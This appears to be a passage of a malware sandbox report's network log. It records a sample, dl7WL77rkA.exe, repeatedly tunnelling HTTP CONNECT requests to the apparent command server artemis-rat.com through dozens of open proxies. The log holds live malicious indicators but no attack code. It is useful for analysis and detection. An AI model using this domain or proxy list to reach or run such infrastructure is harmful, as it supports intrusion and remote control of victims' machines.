                                                                                                                                                                                                                                                            181192.168.2.55044245.196.151.9754323876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.402801991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.620161057 CET308INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Server: FaaS v1.3-20220203-7fa38bd5af
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 65
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm="Proxy"
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            182192.168.2.55043092.204.134.38597273876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.402803898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.936080933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.639250994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.202007055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.092679024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.905369043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.702076912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.405136108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            183192.168.2.55035943.133.71.20156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.404417992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            184192.168.2.550386188.164.193.178112513876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.406867027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.045452118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.920459032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.702378988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
185 | 192.168.2.5 | 50470 | 104.16.230.163 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.409444094 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.564297915 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:38 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
186 | 192.168.2.5 | 50467 | 172.64.207.185 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.410758972 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.574661016 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:38 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
187 | 192.168.2.5 | 50476 | 45.12.30.231 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.412154913 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.566731930 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:38 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
188 | 192.168.2.5 | 50361 | 106.14.255.124 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.412293911 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.742332935 CET | 309 | IN | HTTP/1.1 400 Bad Request
Server: nginx/1.20.1
Date: Mon, 11 Mar 2024 02:30:38 GMT
Content-Type: text/html
Content-Length: 157
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
189 | 192.168.2.5 | 50443 | 198.199.120.65 | 8000 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.415688992 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
190 | 192.168.2.5 | 50357 | 83.243.92.154 | 8080 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.416587114 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.123603106 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.123641014 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
191 | 192.168.2.5 | 50486 | 185.162.231.254 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.420460939 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.577233076 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:38 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
192 | 192.168.2.5 | 50388 | 136.243.82.121 | 1082 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.422524929 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.830028057 CET | 84 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:38 GMT
Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            193192.168.2.55032845.139.11.134803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.424078941 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.811600924 CET | 309 | IN | HTTP/1.1 400 Bad Request
Server: nginx/1.24.0
Date: Mon, 11 Mar 2024 02:30:38 GMT
Content-Type: text/html
Content-Length: 157
Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            194192.168.2.550394119.193.137.10431283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.427164078 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.076730013 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.906594038 CET | 39 | IN | HTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
195 | 192.168.2.5 | 49779 | 194.163.159.93 | 35081 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.429287910 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.514400005 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.548244953 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.608361959 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:02.641196966 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
196 | 192.168.2.5 | 49784 | 5.252.23.249 | 3128 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.469378948 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.592494011 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.593139887 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.592756987 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:02.592715979 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
197 | 192.168.2.5 | 50345 | 65.1.40.47 | 1080 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.469382048 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.854011059 CET | 116 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:38 GMT
Server: nginx
Content-Type: text/plain
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            198192.168.2.550423203.222.24.36803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.470297098 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.107964993 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.832882881 CET | 340 | IN | HTTP/1.1 400 Bad Request
Server: nginx/1.12.2
Date: Mon, 11 Mar 2024 02:30:38 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 173
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            199192.168.2.550392201.238.248.13992293876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.470441103 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.420389891 CET | 161 | IN | HTTP/1.1 503 Too many open connections
Proxy-Agent: Privoxy 3.0.21
Content-Type: text/plain
Connection: close
Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a
Data Ascii: Maximum number of open connections reached.


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            200192.168.2.55046138.162.4.6931283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.470544100 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.884592056 CET | 111 | IN | HTTP/1.1 407 Proxy Authentication Required
Proxy-Authenticate: Basic realm=""
Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            201192.168.2.550398177.12.118.160803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.470544100 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.797940016 CET | 340 | IN | HTTP/1.1 400 Bad Request
Server: nginx/1.12.2
Date: Mon, 11 Mar 2024 02:30:38 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 173
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            202192.168.2.5504135.252.23.22010813876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.470746040 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            203192.168.2.550417185.225.232.191803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.470746040 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.453131914 CET | 805 | IN | HTTP/1.1 500 Internal Server Error
Date: Mon, 11 Mar 2024 02:30:38 GMT
Server: Apache/2.4.57 (Debian)
Content-Length: 613
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.57 (Debian) Server at artemis-rat.com Port 443</address></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            204192.168.2.550520104.18.136.28803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.471976995 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.626490116 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:38 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            205192.168.2.55043113.37.59.9931283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.471976995 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.773873091 CET | 116 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:38 GMT
Server: nginx
Content-Type: text/plain
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
206 | 192.168.2.5 | 50471 | 5.161.103.113 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.472050905 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
